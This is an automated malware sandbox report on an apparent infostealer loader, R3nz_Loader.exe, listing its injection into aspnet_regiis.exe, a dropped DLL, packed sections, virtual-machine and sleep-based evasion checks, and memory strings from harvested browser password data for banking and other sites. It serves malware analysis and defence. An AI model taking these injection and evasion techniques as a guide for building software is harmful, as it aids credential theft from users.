                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027697D03_2_027697D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027957D23_2_027957D2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027867A13_2_027867A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027907A03_2_027907A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278C78B3_2_0278C78B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027794703_2_02779470
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02795C693_2_02795C69
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276DC623_2_0276DC62
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02786C533_2_02786C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277DC303_2_0277DC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02787C363_2_02787C36
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279C42E3_2_0279C42E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027834003_2_02783400
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027984FF3_2_027984FF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277ECF03_2_0277ECF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027674E03_2_027674E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276B49D3_2_0276B49D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02782D703_2_02782D70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E5203_2_0279E520
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027794703_2_02779470
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027815B03_2_027815B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E5B03_2_0279E5B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02776D9A3_2_02776D9A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 027743C0 appears 69 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 02768020 appears 44 times
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224
                          Source: R3nz_Loader.exe, 00000000.00000000.2009877409.0000000000AC0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameXeniaHarveyKaitlyn.pdfkW4 vs R3nz_Loader.exe
                          Source: R3nz_Loader.exe, 00000000.00000002.2234322124.000000000128E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs R3nz_Loader.exe
                          Source: R3nz_Loader.exe Binary or memory string: OriginalFilenameXeniaHarveyKaitlyn.pdfkW4 vs R3nz_Loader.exe
                          Source: R3nz_Loader.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: R3nz_Loader.exe Static PE information: Section: ^]tBD;I ZLIB complexity 1.0003187697249774
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/7@1/1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02797BA0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 3_2_02797BA0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe File created: C:\Users\user\AppData\Roaming\gdi32.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2684
                          Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\962343f8-2ba8-45a0-ad7c-aa94d894f88d
                          Source: R3nz_Loader.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: aspnet_regiis.exe, 00000003.00000003.2041331876.0000000004F2A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2041224294.0000000004F45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2053288404.0000000004F52000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: R3nz_Loader.exe ReversingLabs: Detection: 34%
                          Source: R3nz_Loader.exe String found in binary or memory: -addpset
                          Source: R3nz_Loader.exe String found in binary or memory: -addfulltrust
                          Source: R3nz_Loader.exe String found in binary or memory: -addgroup
                          Source: R3nz_Loader.exe String found in binary or memory: -help
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe File read: C:\Users\user\Desktop\R3nz_Loader.exe
                          Source: unknown Process created: C:\Users\user\Desktop\R3nz_Loader.exe "C:\Users\user\Desktop\R3nz_Loader.exe"
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: mscoree.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: apphelp.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: kernel.appcore.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: wldp.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: amsi.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: userenv.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: profapi.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: msasn1.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: gpapi.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: windows.storage.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wldp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winhttp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: webio.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mswsock.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: iphlpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: winnsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: sspicli.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dnsapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rasadhlp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: fwpuclnt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: schannel.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: mskeyprotect.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ntasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncrypt.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: ncryptsslp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: msasn1.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptsp.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: rsaenh.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: cryptbase.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: gpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: dpapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: kernel.appcore.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: uxtheme.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: wbemcomn.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: amsi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: userenv.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: profapi.dll
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Section loaded: version.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                          Source: R3nz_Loader.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: R3nz_Loader.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\Desktop\R3nz_Loader.PDB source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: %%.pdb source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\user\Desktop\R3nz_Loader.PDB source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: WER3C4D.tmp.dmp.6.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER3C4D.tmp.dmp.6.dr
                          Source: Binary string: n0C:\Windows\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLL source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012EC000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001326000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER3C4D.tmp.dmp.6.dr

                          Data Obfuscation

                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Unpacked PE file: 0.2.R3nz_Loader.exe.a10000.0.unpack ^]tBD;I:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                          Source: R3nz_Loader.exe Static PE information: section name: ^]tBD;I
                          Source: R3nz_Loader.exe Static PE information: section name:
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A156EF push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A13AFF push esi; iretd 0_2_00A13B00
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A156CC push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A15801 push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A16A00 push edi; iretd 0_2_00A16A01
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A16465 push 1E68DD25h; retf 0_2_00A1646B
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A1567B push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A1427A push ds; iretd 0_2_00A14283
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A1564A push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A1564F push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A127B0 push ebx; retf 0_2_00A127B5
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A1573A push esi; iretd 0_2_00A15736
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A15715 push esi; iretd 0_2_00A15736
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A12519 push edi; retf 0_2_00A1251A
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Code function: 0_2_00A1575F push esi; iretd 0_2_00A15846
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0279E220 push eax; mov dword ptr [esp], 66616053h 3_2_0279E222
                          Source: R3nz_Loader.exe Static PE information: section name: ^]tBD;I entropy: 7.999688407134414
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe File created: C:\Users\user\AppData\Roaming\gdi32.dll
                          Source: C:\Users\user\Desktop\R3nz_Loader.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: R3nz_Loader.exe PID: 2684, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 11F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 4D70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 5460000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 6460000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 6590000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 7590000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 79E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 89E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Memory allocated: 99E0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Window / User API: threadDelayed 6825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 4508 | Thread sleep time: -210000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7268 | Thread sleep count: 6825 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF4322 FindFirstFileExW, 0_2_6CEF4322
Source: Amcache.hve.6.dr | Binary or memory string: VMware
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000002.3271176576.0000000002A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0f
Source: aspnet_regiis.exe, 00000003.00000002.3271368717.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2141165577.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2740576821.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2741053262.0000000002AAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F78000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2052580318.0000000004F73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
